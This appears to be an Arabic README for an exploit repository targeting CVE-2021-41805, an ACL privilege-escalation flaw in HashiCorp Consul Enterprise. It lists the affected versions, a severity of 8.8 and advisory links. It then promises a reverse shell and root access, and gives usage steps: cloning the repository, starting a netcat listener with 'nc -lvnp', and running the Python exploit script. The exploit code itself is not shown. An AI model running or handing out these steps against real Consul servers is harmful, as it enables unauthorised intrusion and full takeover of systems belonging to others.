
استغلال HashiCorp Consul باستخدام بايثون. (CVE-2021-41805)
HashiCorp Consul Enterprise قبل الإصدار 1.8.17، و1.9.x قبل 1.9.11، و1.10.x قبل 1.10.4 يعاني من تحكم غير صحيح في الوصول. يمكن استخدام رمز ACL (مع صلاحيات operator:write الافتراضية) في مساحة اسم واحدة لتصعيد امتيازات غير مقصود في مساحة اسم مختلفة.
CVE_ID : CVE-2021-41805
النتيجة الأساسية : 8.8
الخطورة : عالية
صدر في : 2021-12-12
الإصدارات المتأثرة : HashiCorp Consul Enterprise قبل 1.8.17، و1.9.x قبل 1.9.11، و1.10.x قبل 1.10.4
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
احصل على قشرة عكسية، واحصل على صلاحيات الجذر.
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
ثم شغّل المستمع:
sudo nc -lvnp <port>
ثم شغّل الاستغلال:
python3 CVE-2021-41805.py